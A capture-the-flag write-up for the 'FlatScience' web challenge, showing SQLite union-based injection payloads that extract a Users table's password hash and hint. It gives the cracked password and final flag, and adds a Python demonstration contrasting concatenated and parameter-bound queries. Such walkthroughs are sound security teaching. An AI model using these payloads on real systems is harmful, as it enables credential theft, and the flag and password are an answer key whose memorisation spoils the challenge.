
[Attack and Defense World, Web] Four-star difficulty, 12-point advanced challenge: FlatScience

2022-07-23 21:01:00 Black zone (rise)

2. FlatScience

 

Approach:

1. Understanding the source code, database injection, encryption

Walkthrough:

I prefer to look at the robots.txt file first.

The /admin.php page

The /login.php page


Press Ctrl+U to view the page source.

This reveals ?debug

which exposes new source code.


Start the code audit.

The database turns out to be SQLite3. It differs from MySQL: the relevant information is stored in the sqlite_master table,

whose type/name/tbl_name/rootpage/sql columns record the information from when the user created each table,

and the comment marker is --

The usr input also turns out to be injectable.

There is no filtering, so it is spliced straight into the SQL statement that the database executes.


Intercept the request with bp (Burp Suite) and inject

(the injection is done in bp).

Determine the number of fields:

1' order by 3 --

(returns an error)

1' order by 2 --

(normal response)

So the number of fields is 2.


Determine which field is echoed:

1' union select 1,2 --

The echoed position is the second field.

 


Check the fields in the table through the sql column:

 CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29

  After decoding

 CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

The fields are: id, name, password, hint


Construct a query for name

payload:

1' union select id, name from Users--

 admin


Construct a query for password

payload:

1' union select id, password from Users--

3fab54a50e770d830c0416df817567662a9dc85c


Construct a query for hint

payload:

1' union select id, hint from Users--

 my+fav+word+in+my+fav+paper%3F%21

After decoding

my+fav+word+in+my+fav+paper?!
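Why the probes above behave as they do, and how parameter binding stops them, shown as an added example that is not part of the original write-up or of the challenge's code. Only the Users schema and the payload strings come from the page; the two-column query shape, the function names and the row contents are assumptions.

```python
import sqlite3

PAYLOADS = [  # injection strings quoted from the write-up above
    "1' order by 3 --",
    "1' order by 2 --",
    "1' union select id, password from Users--",
]

def make_db():
    # Constructed stand-in database: schema from the write-up, placeholder data.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users(id int primary key, name varchar(255), "
               "password varchar(255), hint varchar(255))")
    db.execute("INSERT INTO Users VALUES (1, 'admin', 'STORED_HASH', 'a hint')")
    return db

def lookup_concat(db, usr, pw):
    # Vulnerable pattern (assumed query shape): usr is spliced into the SQL
    # text, so a quote in it ends the literal and the rest is parsed as SQL.
    sql = ("SELECT id, name FROM Users WHERE name='" + usr +
           "' AND password='" + pw + "'")
    return db.execute(sql).fetchall()

def lookup_bound(db, usr, pw):
    # Hardened pattern: ? placeholders bind usr and pw as values only.
    sql = "SELECT id, name FROM Users WHERE name=? AND password=?"
    return db.execute(sql, (usr, pw)).fetchall()

def outcome(fn, db, usr, pw="x"):
    # Summarise a lookup as "error: ..." or as the list of rows returned.
    try:
        return fn(db, usr, pw)
    except sqlite3.Error as exc:
        return "error: " + str(exc)

if __name__ == "__main__":
    db = make_db()
    for p in PAYLOADS:
        print(repr(p))
        print("  concatenated:", outcome(lookup_concat, db, p))
        print("  bound:       ", outcome(lookup_bound, db, p))
```

With the concatenated query the three strings produce an error, an empty result and a leaked password column, matching the responses described above; with bound parameters each one is just a name that matches no row.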


This gives us the first row of the table:

id=1

name=admin

password=3fab54a50e770d830c0416df817567662a9dc85c (MD5 is a message-digest algorithm, so cracking it may not work out)

hint=my+fav+word+in+my+fav+paper?! (it's in his paper)

 

The hash decrypts to

ThinJerboaSalz!


That word is Salz.

ThinJerboaSalz! minus Salz

So the password is ThinJerboa


Log in on the /admin.php page:

flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?} 


Copyright notice
This article was written by [Black zone (rise)]. Please include a link to the original when reposting, thank you.
https://yzsam.com/2022/204/202207232030441222.html